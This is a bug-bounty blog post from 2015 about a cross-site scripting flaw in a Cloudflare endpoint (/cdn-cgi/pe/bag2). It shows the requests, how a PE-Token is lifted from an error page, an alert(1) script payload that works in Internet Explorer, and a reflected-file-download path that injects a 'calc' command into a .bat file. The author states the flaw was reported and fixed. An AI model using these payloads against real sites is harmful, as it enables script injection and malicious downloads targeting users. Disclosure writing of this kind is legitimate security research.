Monday, November 16, 2015

Cloudflare - when the firewall fall in protect it self

Hi ,

From along time ago  , I found a bug in http://securityundefined.com of xss vuln in the path


I reported it and got fixed after while 

the vulnerable parameter was (r[])  , but I did not know that the path  (/cdn-cgi/pe/bag2?r[]=) is for cloudflare so I did not look for 

After that I was searching in some bug bounty and get  


I was surprised for see this path again I was saying maybe it is vulnerable like the previews one . 

 So I did simple GET request

GET /cdn-cgi/pe/bag2?r= HTTP/1.1
Host: xxxxxxxxxxxxxxxx.foo

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I got 

HTTP/1.1 405 Not Allowed
Date: Mon, 16 Nov 2015 16:17:42 GMT
Content-Type: text/html
Server: cloudflare-nginx
cf-ray: 246481f1dd7c08ea-CDG
Transfer-Encoding: chunked
Connection: Keep-Alive

 What ?!! the website is not for cloudflare ? why the respond
server is cloudflare ?
 I understand that it use cloudfalre services 

But how it is work ? and why I get (405 Not Allowed) in respond , and I want a (200 OK !) 

I used proxy to get clear HTTP request that get the 200 OK . 

/cdn-cgi/pe/bag2?r[]=http://foo.bar/xxx.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I saw the (PE-Token) in the request and I cahnged the (http://foo.bar/xxx.js) to (<script>alert(1)</script>)

Firefox : nothing ! 
IE 9,10,11 : the XSS works !!

after some looking the context type was set to (
Content-Type: multipart/mixed)
for that IE read as HTML page and js works . 

But here is problem where can I have (PE-Token) ??
Solve : when you do (
405 Not Allowed) you will get a simple page .

if you view the source code  you will see a

<head><title>405 Not Allowed</title><script type="text/javascript">
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1438806465,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"xxxxxxxxxxx",petok:"1181d2a8d2f71217d89f9a70eb521bd7334e1a25-1438819567-1800",betok:"6ac82112672bec8b142092f8509e441fc0771df0-1438819567-120",zone:"salesforce.com",rocket:"0",apps:{"clky":{"sid":"xxxx","uid":"xxxx"}}}];!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>

The  petok = PE-Token 

Now we can make a poc  , if we have good crossdomain policy allow to do cross rqesut 
 I did not get a website a like so it was just scenario 

I see that many websites use the service from cloudflare 

here is some of it and with XSS 

 There are many more .

And you can use it as RFD :

GET /cdn-cgi/pe/bag2;/update.bat?r[]=%22FOO:BAR\%22||calc||%22

I reported it to cloudfalre they marked as N/A but they fixed anyway . 

Done !!